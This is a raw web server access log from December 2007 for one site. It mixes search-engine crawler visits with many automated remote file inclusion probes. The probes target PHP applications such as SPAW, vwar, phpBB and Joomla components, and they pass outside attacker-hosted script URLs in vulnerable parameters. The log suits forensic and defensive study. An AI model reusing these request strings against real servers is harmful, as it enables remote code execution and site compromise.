83.170.102.103 - - [27/Dec/2007:07:57:09 -0800] "GET /logs/calendar/tools/send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.102.103 - - [27/Dec/2007:07:57:09 -0800] "GET /calendar/tools/send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.29.37 - - [27/Dec/2007:07:59:23 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
150.164.55.19 - - [27/Dec/2007:08:05:50 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.164.55.19 - - [27/Dec/2007:08:05:51 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.164.55.19 - - [27/Dec/2007:08:05:51 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.164.55.19 - - [27/Dec/2007:08:11:38 -0800] "GET /logs/access_071215.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.52.143.16 - - [27/Dec/2007:08:11:46 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [27/Dec/2007:08:12:01 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
72.29.82.80 - - [27/Dec/2007:08:14:05 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.menschenrechtsstadt.at/ol/info.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.255.3.70 - - [27/Dec/2007:08:17:33 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://sagasufx.com/stats.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
89.255.3.70 - - [27/Dec/2007:08:17:33 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://sagasufx.com/stats.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.36.115.60 - - [27/Dec/2007:08:18:35 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.60 - - [27/Dec/2007:08:18:36 -0800] "GET /tmp/sess_79e33a704959ddf26887d19bfc2101b1 HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
209.31.183.20 - - [27/Dec/2007:08:23:55 -0800] "GET /naboard_pnr.php?skin=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
209.31.183.20 - - [27/Dec/2007:08:23:56 -0800] "GET /logs/naboard_pnr.php?skin=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
216.17.107.53 - - [27/Dec/2007:08:27:35 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.17.107.53 - - [27/Dec/2007:08:27:35 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.64" "www.dmulk.com"
216.17.107.53 - - [27/Dec/2007:08:27:35 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 27536 "-" "libwww-perl/5.64" "www.dmulk.com"
216.17.107.53 - - [27/Dec/2007:08:28:31 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.17.107.53 - - [27/Dec/2007:08:28:31 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.64" "www.dmulk.com"
216.17.107.53 - - [27/Dec/2007:08:28:31 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 27536 "-" "libwww-perl/5.64" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:08:28:31 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.142 - - [27/Dec/2007:08:33:31 -0800] "GET /logs/access_070901.log HTTP/1.0" 200 28607 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.52.230.10 - - [27/Dec/2007:08:43:46 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.230.10 - - [27/Dec/2007:08:43:46 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.230.10 - - [27/Dec/2007:08:43:47 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 200 28103 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.22 - - [27/Dec/2007:08:48:17 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:08:50:16 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
122.153.16.5 - - [27/Dec/2007:08:51:44 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.178 - - [27/Dec/2007:08:52:32 -0800] "GET /logs/access_071212.log/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.178 - - [27/Dec/2007:08:52:32 -0800] "GET /http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.178 - - [27/Dec/2007:08:52:32 -0800] "GET /logs/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:08:54:32 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:08:54:32 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:08:54:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:08:54:33 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:08:54:36 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:08:54:37 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:08:54:48 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.36 - - [27/Dec/2007:08:55:08 -0800] "GET /logs/access_071212.log/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.36 - - [27/Dec/2007:08:55:08 -0800] "GET /http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.36 - - [27/Dec/2007:08:55:09 -0800] "GET /logs/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.115.47 - - [27/Dec/2007:09:01:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.47 - - [27/Dec/2007:09:01:08 -0800] "GET /logs/access_070829.log HTTP/1.0" 200 34921 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
74.53.197.178 - - [27/Dec/2007:09:01:09 -0800] "GET /logs/access_071212.log/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.178 - - [27/Dec/2007:09:01:09 -0800] "GET /http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.178 - - [27/Dec/2007:09:01:10 -0800] "GET /logs/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.26.36 - - [27/Dec/2007:09:03:10 -0800] "GET /logs/access_071212.log/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.36 - - [27/Dec/2007:09:03:11 -0800] "GET /http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.36 - - [27/Dec/2007:09:03:11 -0800] "GET /logs/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:09:11:41 -0800] "GET /retreat1/?S=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.197.178 - - [27/Dec/2007:09:11:53 -0800] "GET /logs/access_071111.log/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.170 - - [27/Dec/2007:09:15:59 -0800] "GET /logs/access_070810.log HTTP/1.0" 200 58508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.205.123.49 - - [27/Dec/2007:09:16:23 -0800] "GET /ncludes/functions_admin.php?phpbb_root_path=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.178 - - [27/Dec/2007:09:17:56 -0800] "GET /logs/access_071111.log/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.26.36 - - [27/Dec/2007:09:25:39 -0800] "GET /logs/access_071111.log/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.48.80.141 - - [27/Dec/2007:09:27:21 -0800] "GET /logs/access_071105.log/includes/functions_admin.php?phpbb_root_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [27/Dec/2007:09:27:21 -0800] "GET /includes/functions_admin.php?phpbb_root_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [27/Dec/2007:09:27:22 -0800] "GET /logs/includes/functions_admin.php?phpbb_root_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [27/Dec/2007:09:28:01 -0800] "GET /logs/access_071216.log/includes/functions_admin.php?phpbb_root_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:28:07 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:29:24 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:29:24 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:29:24 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:30:33 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.36 - - [27/Dec/2007:09:31:53 -0800] "GET /logs/access_071111.log/http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
152.46.7.81 - - [27/Dec/2007:09:32:53 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
152.46.7.81 - - [27/Dec/2007:09:32:54 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
152.46.7.81 - - [27/Dec/2007:09:32:54 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.123.49 - - [27/Dec/2007:09:32:58 -0800] "GET /logs/access_071105.log/ncludes/functions_admin.php?phpbb_root_path=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.123.49 - - [27/Dec/2007:09:32:58 -0800] "GET /logs/ncludes/functions_admin.php?phpbb_root_path=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:33:16 -0800] "GET /convert/mvcw.php?vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.205.123.49 - - [27/Dec/2007:09:33:41 -0800] "GET /logs/access_071129.log/ncludes/functions_admin.php?phpbb_root_path=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.73 - - [27/Dec/2007:09:36:09 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:09:45:55 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.219 - - [27/Dec/2007:09:48:25 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:55:05 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:55:06 -0800] "GET /convert/mvcw.php?vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:55:06 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [27/Dec/2007:09:55:25 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:01:43 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:02:25 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:04:51 -0800] "GET /logs/access_071129.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:04:52 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:04:52 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.19 - - [27/Dec/2007:10:06:22 -0800] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freeadnotes.com/images/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [27/Dec/2007:10:06:22 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freeadnotes.com/images/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [27/Dec/2007:10:06:22 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freeadnotes.com/images/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.158 - - [27/Dec/2007:10:07:01 -0800] "GET /tmp/?M=A HTTP/1.0" 200 2167 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:08:34 -0800] "GET /logs/access_071215.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.19 - - [27/Dec/2007:10:09:07 -0800] "GET /logs/access_071212.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freeadnotes.com/images/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.101 - - [27/Dec/2007:10:12:27 -0800] "GET /tmp/sess_bdcf50154aa8d5056282282ccce1b694 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.201 - - [27/Dec/2007:10:13:28 -0800] "GET /logs/access_071007.log HTTP/1.0" 200 56320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.164 - - [27/Dec/2007:10:15:01 -0800] "GET /megumi/Necklace/?D=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.218.141.19 - - [27/Dec/2007:10:16:59 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freeadnotes.com/images/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.203.197 - - [27/Dec/2007:10:19:41 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.123.181 - - [27/Dec/2007:10:20:29 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:10:22:52 -0800] "GET /mobileoffice/?D=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.203.197 - - [27/Dec/2007:10:25:16 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.203.197 - - [27/Dec/2007:10:25:16 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.212 - - [27/Dec/2007:10:25:17 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.203.197 - - [27/Dec/2007:10:25:47 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:10:25:55 -0800] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.200 - - [27/Dec/2007:10:27:53 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.202.123.181 - - [27/Dec/2007:10:28:00 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.181 - - [27/Dec/2007:10:28:00 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.181 - - [27/Dec/2007:10:28:30 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:31:12 -0800] "GET /logs/access_071129.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:31:13 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:32:11 -0800] "GET /logs/access_071129.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:32:12 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.19 - - [27/Dec/2007:10:32:58 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://freeadnotes.com/images/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:33:39 -0800] "GET /logs/access_071215.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [27/Dec/2007:10:34:37 -0800] "GET /logs/access_071215.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.145 - - [27/Dec/2007:10:35:23 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:10:41:34 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.203.197 - - [27/Dec/2007:10:46:32 -0800] "GET /convert/mvcw.php?vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.123.181 - - [27/Dec/2007:10:47:10 -0800] "GET /convert/mvcw.php?vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.203.197 - - [27/Dec/2007:11:00:18 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.becks-touristik.de/union/ID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
